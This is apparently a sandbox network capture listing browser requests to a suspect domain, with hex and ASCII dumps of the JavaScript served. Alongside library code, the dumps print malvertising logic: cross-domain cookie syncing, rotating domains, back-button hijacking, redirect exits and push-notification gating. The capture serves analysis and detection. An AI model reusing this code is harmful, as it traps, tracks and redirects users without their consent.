                                                                                                          Data Ascii: [o]=t[o]);return e},n.apply(this,arguments)};Object.create;function o(e,t,r){if(r||2===arguments.length)for(var n,o=0,s=t.length;o<s;o++)!n&&o in t||(n||(n=Array.prototype.slice.call(t,0,o)),n[o]=t[o]);return e.concat(n||Array.prototype.slice.call(t))}Obj
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 49 28 6a 2c 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 65 29 7b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 39 3a 63 61 73 65 20 31 30 3a 63 61 73 65 20 31 33 3a 63 61 73 65 20 33 32 3a 72 65 74 75 72 6e 20 35 3b 63 61 73 65 20 33 33 3a 63 61 73 65 20 34 33 3a 63 61 73 65 20 34 34 3a 63 61 73 65 20 34 37 3a 63 61 73 65 20 36 32 3a 63 61 73 65 20 36 34 3a 63 61 73 65 20 31 32 36 3a 63 61 73 65 20 35 39 3a 63 61 73 65 20 31 32 33 3a 63 61 73 65 20 31 32 35 3a 72 65 74 75 72 6e 20 34 3b 63 61 73 65 20 35 38 3a 72 65 74 75 72 6e 20 33 3b 63 61 73 65 20 33 34 3a 63 61 73 65 20 33 39 3a 63 61 73 65 20 34 30 3a 63 61 73 65 20 39 31 3a 72 65 74 75 72 6e 20 32 3b 63 61 73 65 20 34 31 3a 63 61 73 65
                                                                                                          Data Ascii: (e,t){return I(j,e,t)}function L(e){switch(e){case 0:case 9:case 10:case 13:case 32:return 5;case 33:case 43:case 44:case 47:case 62:case 64:case 126:case 59:case 123:case 125:return 4;case 58:return 3;case 34:case 39:case 40:case 91:return 2;case 41:case
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 7b 63 61 73 65 20 35 31 30 33 3a 72 65 74 75 72 6e 20 6c 2b 22 70 72 69 6e 74 2d 22 2b 65 2b 65 3b 63 61 73 65 20 35 37 33 37 3a 63 61 73 65 20 34 32 30 31 3a 63 61 73 65 20 33 31 37 37 3a 63 61 73 65 20 33 34 33 33 3a 63 61 73 65 20 31 36 34 31 3a 63 61 73 65 20 34 34 35 37 3a 63 61 73 65 20 32 39 32 31 3a 63 61 73 65 20 35 35 37 32 3a 63 61 73 65 20 36 33 35 36 3a 63 61 73 65 20 35 38 34 34 3a 63 61 73 65 20 33 31 39 31 3a 63 61 73 65 20 36 36 34 35 3a 63 61 73 65 20 33 30 30 35 3a 63 61 73 65 20 36 33 39 31 3a 63 61 73 65 20 35 38 37 39 3a 63 61 73 65 20 35 36 32 33 3a 63 61 73 65 20 36 31 33 35 3a 63 61 73 65 20 34 35 39 39 3a 63 61 73 65 20 34 38 35 35 3a 63 61 73 65 20 34 32 31 35 3a 63 61 73 65 20 36 33 38 39 3a 63 61 73 65 20 35 31 30 39 3a 63 61
                                                                                                          Data Ascii: {case 5103:return l+"print-"+e+e;case 5737:case 4201:case 3177:case 3433:case 1641:case 4457:case 2921:case 5572:case 6356:case 5844:case 3191:case 6645:case 3005:case 6391:case 5879:case 5623:case 6135:case 4599:case 4855:case 4215:case 6389:case 5109:ca
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 29 2f 2c 22 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 24 33 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 24 33 22 29 2c 2f 73 2e 2b 2d 62 5b 5e 3b 5d 2b 2f 2c 22 6a 75 73 74 69 66 79 22 29 2b 6c 2b 65 2b 65 3b 63 61 73 65 20 34 32 30 30 3a 69 66 28 21 53 28 65 2c 2f 66 6c 65 78 2d 7c 62 61 73 65 6c 69 6e 65 2f 29 29 72 65 74 75 72 6e 20 63 2b 22 67 72 69 64 2d 63 6f 6c 75 6d 6e 2d 61 6c 69 67 6e 22 2b 49 28 65 2c 74 29 2b 65 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 35 39 32 3a 63 61 73 65 20 33 33 36 30 3a 72 65 74 75 72 6e 20 63 2b 62 28 65 2c 22 74 65 6d 70 6c 61 74 65 2d 22 2c 22 22 29 2b 65 3b 63 61 73 65 20 34 33 38 34 3a 63 61 73 65 20 33 36 31 36 3a 72 65 74 75 72 6e 20 72 26 26 72 2e 73 6f 6d 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b
                                                                                                          Data Ascii: )/,"-webkit-box-pack:$3-ms-flex-pack:$3"),/s.+-b[^;]+/,"justify")+l+e+e;case 4200:if(!S(e,/flex-|baseline/))return c+"grid-column-align"+I(e,t)+e;break;case 2592:case 3360:return c+b(e,"template-","")+e;case 4384:case 3616:return r&&r.some((function(e,r){
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 24 32 24 33 24 31 22 2b 63 2b 22 24 32 62 6f 78 24 33 22 29 2b 65 3b 63 61 73 65 20 31 30 30 3a 72 65 74 75 72 6e 20 62 28 65 2c 22 3a 22 2c 22 3a 22 2b 63 29 2b 65 7d 62 72 65 61 6b 3b 63 61 73 65 20 35 37 31 39 3a 63 61 73 65 20 32 36 34 37 3a 63 61 73 65 20 32 31 33 35 3a 63 61 73 65 20 33 39 32 37 3a 63 61 73 65 20 32 33 39 31 3a 72 65 74 75 72 6e 20 62 28 65 2c 22 73 63 72 6f 6c 6c 2d 22 2c 22 73 63 72 6f 6c 6c 2d 73 6e 61 70 2d 22 29 2b 65 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 65 2c 74 2c 72 2c 6e 29 7b 69 66 28 65 2e 6c 65 6e 67 74 68 3e 2d 31 26 26 21 65 2e 72 65 74 75 72 6e 29 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 68 3a 72 65 74 75 72 6e 20 76 6f 69 64 28 65 2e 72 65 74 75 72 6e 3d 58 28 65 2e 76
                                                                                                          Data Ascii: $2$3$1"+c+"$2box$3")+e;case 100:return b(e,":",":"+c)+e}break;case 5719:case 2647:case 2135:case 3927:case 2391:return b(e,"scroll-","scroll-snap-")+e}return e}function ee(e,t,r,n){if(e.length>-1&&!e.return)switch(e.type){case h:return void(e.return=X(e.v
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 31 32 35 3a 79 3d 30 3b 63 61 73 65 20 35 39 2b 6c 3a 2d 31 3d 3d 53 26 26 28 24 3d 62 28 24 2c 2f 5c 66 2f 67 2c 22 22 29 29 2c 68 3e 30 26 26 50 28 24 29 2d 66 26 26 41 28 68 3e 33 32 3f 73 65 28 24 2b 22 3b 22 2c 6e 2c 72 2c 66 2d 31 2c 63 29 3a 73 65 28 62 28 24 2c 22 20 22 2c 22 22 29 2b 22 3b 22 2c 6e 2c 72 2c 66 2d 32 2c 63 29 2c 63 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 39 3a 24 2b 3d 22 3b 22 3b 64 65 66 61 75 6c 74 3a 69 66 28 41 28 4f 3d 6e 65 28 24 2c 74 2c 72 2c 75 2c 6c 2c 6f 2c 69 2c 78 2c 45 3d 5b 5d 2c 6b 3d 5b 5d 2c 66 2c 73 29 2c 73 29 2c 31 32 33 3d 3d 3d 49 29 69 66 28 30 3d 3d 3d 6c 29 72 65 28 24 2c 74 2c 4f 2c 4f 2c 45 2c 73 2c 66 2c 69 2c 6b 29 3b 65 6c 73 65 20 73 77 69 74 63 68 28 39 39 3d 3d 3d 70 26 26 31 31 30 3d 3d 3d 43
                                                                                                          Data Ascii: 125:y=0;case 59+l:-1==S&&($=b($,/\f/g,"")),h>0&&P($)-f&&A(h>32?se($+";",n,r,f-1,c):se(b($," ","")+";",n,r,f-2,c),c);break;case 59:$+=";";default:if(A(O=ne($,t,r,u,l,o,i,x,E=[],k=[],f,s),s),123===I)if(0===l)re($,t,O,O,E,s,f,i,k);else switch(99===p&&110===C
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 72 74 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 45 6e 64 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 74 61 72 74 3a 31 2c 6d 73 47 72 69 64 52 6f 77 3a 31 2c 6d 73 47 72 69 64 52 6f 77 53 70 61 6e 3a 31 2c 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 3a 31 2c 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3a 31 2c 66 6f 6e 74 57 65 69 67 68 74 3a 31 2c 6c 69 6e 65 48 65 69 67 68 74 3a 31 2c 6f 70 61 63 69 74 79 3a 31 2c 6f 72 64 65 72 3a 31 2c 6f 72 70 68 61 6e 73 3a 31 2c 74 61 62 53 69 7a 65 3a 31 2c 77 69 64 6f 77 73 3a 31 2c 7a 49 6e 64 65 78 3a 31 2c 7a 6f 6f 6d 3a 31 2c 57 65 62 6b 69 74 4c 69 6e 65 43 6c 61 6d 70 3a 31 2c 66 69 6c 6c 4f 70 61 63 69 74 79 3a 31 2c 66 6c 6f
                                                                                                          Data Ascii: rt:1,gridColumn:1,gridColumnEnd:1,gridColumnSpan:1,gridColumnStart:1,msGridRow:1,msGridRowSpan:1,msGridColumn:1,msGridColumnSpan:1,fontWeight:1,lineHeight:1,opacity:1,order:1,orphans:1,tabSize:1,widows:1,zIndex:1,zoom:1,WebkitLineClamp:1,fillOpacity:1,flo
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 64 61 74 61 22 2c 22 64 61 74 61 6c 69 73 74 22 2c 22 64 64 22 2c 22 64 65 6c 22 2c 22 64 65 74 61 69 6c 73 22 2c 22 64 66 6e 22 2c 22 64 69 61 6c 6f 67 22 2c 22 64 69 76 22 2c 22 64 6c 22 2c 22 64 74 22 2c 22 65 6d 22 2c 22 65 6d 62 65 64 22 2c 22 66 69 65 6c 64 73 65 74 22 2c 22 66 69 67 63 61 70 74 69 6f 6e 22 2c 22 66 69 67 75 72 65 22 2c 22 66 6f 6f 74 65 72 22 2c 22 66 6f 72 6d 22 2c 22 68 31 22 2c 22 68 32 22 2c 22 68 33 22 2c 22 68 34 22 2c 22 68 35 22 2c 22 68 36 22 2c 22 68 65 61 64 65 72 22 2c 22 68 67 72 6f 75 70 22 2c 22 68 72 22 2c 22 68 74 6d 6c 22 2c 22 69 22 2c 22 69 66 72 61 6d 65 22 2c 22 69 6d 67 22 2c 22 69 6e 70 75 74 22 2c 22 69 6e 73 22 2c 22 6b 62 64 22 2c 22 6b 65 79 67 65 6e 22 2c 22 6c 61 62 65 6c 22 2c 22 6c 65 67 65 6e 64 22
                                                                                                          Data Ascii: data","datalist","dd","del","details","dfn","dialog","div","dl","dt","em","embed","fieldset","figcaption","figure","footer","form","h1","h2","h3","h4","h5","h6","header","hgroup","hr","html","i","iframe","img","input","ins","kbd","keygen","label","legend"
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 21 30 7d 76 61 72 20 5f 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 66 6f 72 2c 6a 65 3d 5f 65 3f 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 6d 65 6d 6f 22 29 3a 36 30 31 31 35 2c 4e 65 3d 5f 65 3f 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 66 6f 72 77 61 72 64 5f 72 65 66 22 29 3a 36 30 31 31 32 2c 44 65 3d 7b 63 68 69 6c 64 43 6f 6e 74 65 78 74 54 79 70 65 73 3a 21 30 2c 63 6f 6e 74 65 78 74 54 79 70 65 3a 21 30 2c 63 6f 6e 74 65 78 74 54 79 70 65 73 3a 21 30 2c 64 65 66 61 75 6c 74 50 72 6f 70 73 3a 21 30 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 21 30 2c 67 65 74 44 65 66 61 75 6c 74 50 72
                                                                                                          Data Ascii: {return"string"==typeof e&&!0}var _e="function"==typeof Symbol&&Symbol.for,je=_e?Symbol.for("react.memo"):60115,Ne=_e?Symbol.for("react.forward_ref"):60112,De={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultPr


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          23192.168.2.450068104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:20 UTC553OUTGET /_next/static/chunks/27da6a71c55717fa-1736072686539.1f230f14e978af7b.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:20 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:20 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-36f1"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1053
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:20 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415a7dab43ef-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:20 UTC873INData Raw: 33 36 66 31 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 33 35 35 37 5d 2c 7b 39 30 39 37 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 2c 65 29 7b 65 2e 64 28 69 2c 7b 41 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 76 61 72 20 74 3d 65 28 39 38 37 38 38 29 2c 6f 3d 65 28 34 32 38 33 38 29 2c 72 3d 65 28 37 30 38 36 35 29 2c 61 3d 65 28 39 36 36 37 30 29 2c 63 3d 65 28 32 32 39 37 30 29 2c 73 3d 65 28 32 39 35 30 35 29 2c 75 3d 65 28 31 33 39 32 33 29 2c 6c 3d 65 28 37 31 39 36 31 29 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 28 30 2c 74 2e 5a 29
                                                                                                          Data Ascii: 36f1"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[73557],{9097:function(n,i,e){e.d(i,{A:function(){return d}});var t=e(98788),o=e(42838),r=e(70865),a=e(96670),c=e(22970),s=e(29505),u=e(13923),l=e(71961),d=function(){var n=(0,t.Z)
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 66 29 7d 29 5d 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 28 6d 3d 63 2e 73 65 6e 74 28 29 29 2e 6f 6b 3f 5b 33 2c 34 5d 3a 5b 34 2c 6d 2e 74 65 78 74 28 29 5d 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 76 3d 63 2e 73 65 6e 74 28 29 2c 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 20 2d 20 46 65 74 63 68 20 66 61 69 6c 65 64 20 77 69 74 68 20 73 74 61 74 75 73 3a 20 22 2e 63 6f 6e 63 61 74 28 6d 2e 73 74 61 74 75 73 2c 22 2c 20 6d 65 73 73 61 67 65 3a 20 22 29 2e 63 6f 6e 63 61 74 28 76 29 29 2c 5b 32 2c 6e 75 6c 6c 5d 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 5b 34 2c 6d 2e 6a 73 6f 6e 28
                                                                                                          Data Ascii: cation/json"},body:JSON.stringify(f)})];case 2:return(m=c.sent()).ok?[3,4]:[4,m.text()];case 3:return v=c.sent(),console.error("checkCrossDomainCookie - Fetch failed with status: ".concat(m.status,", message: ").concat(v)),[2,null];case 4:return[4,m.json(
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 65 74 69 6d 65 20 6e 6f 74 20 73 65 74 22 29 2c 28 30 2c 6c 2e 63 4d 29 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 5c 6e 44 65 66 61 75 6c 74 20 63 6f 6f 6b 69 65 20 6c 69 66 65 74 69 6d 65 3a 20 22 2e 63 6f 6e 63 61 74 28 6e 2e 72 65 6d 61 69 6e 69 6e 67 54 74 6c 29 29 2c 28 30 2c 73 2e 64 38 29 28 6e 2e 6e 61 6d 65 2c 6e 2e 76 61 6c 75 65 2c 7b 6d 61 78 41 67 65 3a 6e 2e 72 65 6d 61 69 6e 69 6e 67 54 74 6c 2c 70 61 74 68 3a 22 2f 22 7d 29 7d 65 6c 73 65 28 30 2c 6c 2e 63 4d 29 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 5c 6e 43 6f 6f 6b 69 65 20 22 2e 63 6f 6e 63 61 74 28 6e 2e 6e 61 6d 65 2c 22 20 6e 6f 74 20 65 78 69 73 74 22 29 29 7d 29 29 2c 5b 32 2c 6b 5d 3b 63 61 73 65 20 36 3a 72 65 74 75
                                                                                                          Data Ascii: etime not set"),(0,l.cM)("checkCrossDomainCookie\nDefault cookie lifetime: ".concat(n.remainingTtl)),(0,s.d8)(n.name,n.value,{maxAge:n.remainingTtl,path:"/"})}else(0,l.cM)("checkCrossDomainCookie\nCookie ".concat(n.name," not exist"))})),[2,k];case 6:retu
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 75 6c 6c 21 3d 3d 28 74 3d 28 30 2c 6f 2e 65 6a 29 28 6e 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 30 22 2c 31 30 29 7d 7d 2c 35 30 36 35 36 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 2c 65 29 7b 65 2e 64 28 69 2c 7b 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 7d 29 3b 76 61 72 20 74 3d 65 28 31 32 31 33 39 29 2c 6f 3d 65 28 36 31 36 35 36 29 2c 72 3d 65 28 38 33 32 31 36 29 2c 61 3d 65 28 37 31 39 36 31 29 2c 63 3d 65 28 33 35 31 34 37 29 2c 73 3d 65 28 32 31 38 31 38 29 2c 75 3d 65 28 35 31 36 35 39 29 2c 6c 3d 65 28 39 34 33 39 37 29 2c 64 3d 65 28 31 39 34 39 35 29 2c 66 3d 5b 22 63 6f 61 6a 75 74 6f 61 2e 63 6f 6d 22 2c 22 66 75 72 67 6f 6f 6d 69 2e 63 6f 6d 22 2c 22 6b 61 62 6f 72 74 6f 74 2e 63 6f 6d 22 5d 2c 6d 3d 66
                                                                                                          Data Ascii: ull!==(t=(0,o.ej)(n))&&void 0!==t?t:"0",10)}},50656:function(n,i,e){e.d(i,{N:function(){return m}});var t=e(12139),o=e(61656),r=e(83216),a=e(71961),c=e(35147),s=e(21818),u=e(51659),l=e(94397),d=e(19495),f=["coajutoa.com","furgoomi.com","kabortot.com"],m=f
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 75 72 6c 29 29 2c 5b 22 75 72 6c 22 2c 6e 75 6c 6c 3d 3d 3d 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 75 72 6c 5d 3b 76 61 72 20 6f 3d 69 2e 7a 6f 6e 65 73 44 65 74 61 69 6c 73 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 22 6f 6e 63 6c 69 63 6b 22 3d 3d 3d 6e 2e 66 6f 72 6d 61 74 26 26 22 63 75 72 72 65 6e 74 22 3d 3d 3d 6e 2e 74 61 62 7d 29 29 2c 72 3d 28 6e 75 6c 6c 3d 3d 3d 6f 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 69 64 29 7c 7c 65 3b 72 65 74 75 72 6e 20 72 3d 28 30 2c 75 2e 70 52 29 28 72 29 2c 28 30 2c 61 2e 50 4e 29 28 22 42 61 63 6b 20 69 6e 69 74 65 64 20 6f 6e 20 7a 6f 6e 65 54 79 70 65 3a 20 22
                                                                                                          Data Ascii: ||void 0===t?void 0:t.url)),["url",null===t||void 0===t?void 0:t.url];var o=i.zonesDetails.find((function(n){return"onclick"===n.format&&"current"===n.tab})),r=(null===o||void 0===o?void 0:o.id)||e;return r=(0,u.pR)(r),(0,a.PN)("Back inited on zoneType: "
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 64 2c 43 3d 6e 2e 62 61 63 6b 5a 6f 6e 65 54 79 70 65 2c 50 3d 76 6f 69 64 20 30 3d 3d 3d 43 3f 75 2e 74 2e 62 61 63 6b 4d 61 69 6e 45 78 69 74 3a 43 2c 44 3d 6e 2e 6c 61 73 74 53 74 65 70 41 75 64 69 65 6e 63 65 2c 53 3d 6e 2e 64 65 6c 61 79 43 75 72 72 65 6e 74 45 78 69 74 2c 54 3d 6e 2e 73 68 6f 75 6c 64 53 65 74 43 6f 6f 6b 69 65 73 2c 67 3d 76 6f 69 64 20 30 3d 3d 3d 54 7c 7c 54 2c 4f 3d 6e 2e 7a 6f 6e 65 73 2c 41 3d 6e 2e 69 73 52 65 64 69 72 65 63 74 42 79 4e 6f 74 69 66 69 63 61 74 69 6f 6e 53 74 61 74 75 73 2c 49 3d 6e 2e 73 68 6f 75 6c 64 44 65 6c 61 79 41 62 69 6c 69 74 79 54 6f 52 65 64 69 72 65 63 74 2c 5f 3d 6e 2e 63 6f 6e 76 65 72 73 69 6f 6e 2c 78 3d 6e 2e 6f 6e 4d 61 69 6e 45 78 69 74 2c 55 3d 6e 2e 63 75 73 74 6f 6d 43 72 65 61 74 65 43
                                                                                                          Data Ascii: d,C=n.backZoneType,P=void 0===C?u.t.backMainExit:C,D=n.lastStepAudience,S=n.delayCurrentExit,T=n.shouldSetCookies,g=void 0===T||T,O=n.zones,A=n.isRedirectByNotificationStatus,I=n.shouldDelayAbilityToRedirect,_=n.conversion,x=n.onMainExit,U=n.customCreateC
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 63 75 73 74 6f 6d 54 61 67 49 6e 69 74 29 7b 69 66 28 21 68 26 26 73 29 72 65 74 75 72 6e 28 30 2c 63 2e 63 4d 29 28 22 5b 75 73 65 52 65 64 69 72 65 63 74 52 65 73 74 72 69 63 74 69 6f 6e 5d 20 64 6f 65 73 6e 27 74 20 77 61 69 74 20 66 6f 72 20 74 68 65 20 70 75 73 68 20 74 61 67 20 74 6f 20 62 65 20 63 72 65 61 74 65 64 20 62 65 63 61 75 73 65 20 69 74 20 69 73 20 69 6e 63 6f 67 6e 69 74 6f 22 29 2c 76 6f 69 64 20 45 28 21 30 29 3b 28 30 2c 63 2e 63 4d 29 28 22 5b 75 73 65 52 65 64 69 72 65 63 74 52 65 73 74 72 69 63 74 69 6f 6e 5d 20 77 61 69 74 20 66 6f 72 20 74 68 65 20 70 75 73 68 20 74 61 67 20 74 6f 20 62 65 20 63 72 65 61 74 65 64 20 6f 72 20 63 68 65 63 6b 20 77 69 6e 64 6f 77 2e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 22 29 2c 21 61 2e 6c 65 6e 67
                                                                                                          Data Ascii: customTagInit){if(!h&&s)return(0,c.cM)("[useRedirectRestriction] doesn't wait for the push tag to be created because it is incognito"),void E(!0);(0,c.cM)("[useRedirectRestriction] wait for the push tag to be created or check window.Notification"),!a.leng
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 62 73 63 72 69 62 65 64 3a 6e 6e 2c 6d 61 69 6e 45 78 69 74 4f 6e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 55 6e 73 75 70 70 6f 72 74 65 64 3a 65 6e 7d 29 7c 7c 65 7d 29 2c 5b 74 6e 5d 29 2c 72 6e 3d 28 30 2c 6f 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 6e 28 22 63 75 72 72 65 6e 74 22 2c 55 29 7d 29 2c 5b 6f 6e 2c 55 5d 29 2c 61 6e 3d 28 30 2c 6f 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 6e 28 22 6e 65 77 22 2c 77 29 7d 29 2c 5b 6f 6e 2c 77 5d 29 2c 63 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 7a 29 28 30 2c 63 2e 79 4e 29 28 22 5b 68 61 6e 64 6c 65 4d 61 69 6e 45 78 69 74 5d 20 45 78 69 74 20 68 61 73 20 62 65 65 6e 20 61 6c 72 65 61
                                                                                                          Data Ascii: bscribed:nn,mainExitOnNotificationUnsupported:en})||e}),[tn]),rn=(0,o.useCallback)((function(){return on("current",U)}),[on,U]),an=(0,o.useCallback)((function(){return on("new",w)}),[on,w]),cn=function(){if(z)(0,c.yN)("[handleMainExit] Exit has been alrea
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 32 34 39 39 29 3b 69 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 28 30 2c 63 2e 45 29 28 29 2e 67 65 74 45 78 69 74 55 72 6c 2c 69 3d 28 30 2c 72 2e 62 70 29 28 29 2e 73 74 61 74 65 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 53 74 61 74 75 73 3b 72 65 74 75 72 6e 7b 67 65 74 4d 61 69 6e 45 78 69 74 42 79 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 63 3d 65 2e 74 61 62 2c 73 3d 65 2e 6d 61 69 6e 45 78 69 74 4f 6e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 42 65 66 6f 72 65 50 65 72 6d 69 73 73 69 6f 6e 50 72 6f 6d 70 74 2c 75 3d 65 2e 6d 61 69 6e 45 78 69 74 4f 6e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 50 65 72 6d 69 73 73 69 6f 6e 44 65 66 61 75 6c 74 2c 6c 3d 65 2e 6d 61 69 6e 45 78 69 74 4f 6e 4e 6f 74
                                                                                                          Data Ascii: 2499);i.Z=function(){var n=(0,c.E)().getExitUrl,i=(0,r.bp)().state.notificationStatus;return{getMainExitByNotification:function(e){var r,c=e.tab,s=e.mainExitOnNotificationBeforePermissionPrompt,u=e.mainExitOnNotificationPermissionDefault,l=e.mainExitOnNot
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 71 75 65 73 74 50 65 72 6d 69 73 73 69 6f 6e 4f 6e 55 73 65 72 41 63 74 69 6f 6e 2c 43 3d 6e 2e 64 6f 50 75 73 68 44 6f 6d 61 69 6e 73 2c 50 3d 43 3f 28 30 2c 61 2e 5a 29 28 28 30 2c 72 2e 5a 29 28 7b 7d 2c 6c 29 2c 28 30 2c 6f 2e 5a 29 28 7b 7d 2c 75 2e 79 2e 44 4f 2c 43 29 29 3a 6c 2c 44 3d 6e 75 6c 6c 21 3d 3d 28 69 3d 28 30 2c 73 2e 72 29 28 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 50 5b 28 30 2c 63 2e 63 29 28 6c 61 6e 64 44 61 74 61 29 2e 70 72 6f 6a 65 63 74 5d 2c 53 3d 6e 75 6c 6c 21 3d 3d 70 26 26 76 6f 69 64 20 30 21 3d 3d 70 3f 70 3a 28 30 2c 64 2e 6b 29 28 44 29 2c 54 3d 28 30 2c 66 2e 53 29 28 7b 6f 61 69 64 3a 65 2c 6f 73 56 65 72 73 69 6f 6e 3a 74 2c 73 75 62 49 64 3a 6d 2c 70 61 73 73 50 61 72 61 6d 54 6f 50 61 72 61 6d 73 3a 62
